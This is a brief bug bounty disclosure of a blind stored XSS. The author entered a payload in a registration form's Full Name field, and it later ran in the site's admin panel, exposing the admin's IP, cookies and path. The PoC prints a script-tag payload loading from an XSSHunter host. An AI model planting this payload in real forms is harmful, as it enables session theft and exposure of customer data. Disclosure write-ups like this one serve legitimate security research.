Description :
Blind XSS is fired up on admin panel on name parameter, While the register there’s a field Full Name, I fill it with XSS Payload, I use XSSHunter to execute this. In a Next day I’ve found my XSS result on XSShunter dashboard through their admin Panel, I able to showing admin IP / Cookies / Path of admin, and etc. Maybe the admin will activate / reviewing the user registration.
PoC :
1. Register new account and fill the Field Full name with Payload From XSSHunter. ( “><script src=https://apapedulim.xss.ht></script> )
2. Complete the registration.
3. Wait on the Next Day.
Impact :
Getting the IP / Cookies / Path Of admin of the XSS and able to get the list of other customer details like Name, IDs.
How Do you Know it’s Blind XSS on admin page?
Actually, Im not sure at the first time I found, After registering my account, I get the email from website to confirm my account, And my name going to ">
in my recent test, I use that payload just showing ">
and XSS payload will execute,
I assume It’ll be Stored XSS and will be fired up on admin panel, So, I wait it, And got the response from admin panel.
Note : The team request limited disclosure.
I contacted the team via their contact page. And got positive report from them, After seeing my report they fix the vuln and will send me some SWAG. Yay!
Thanks.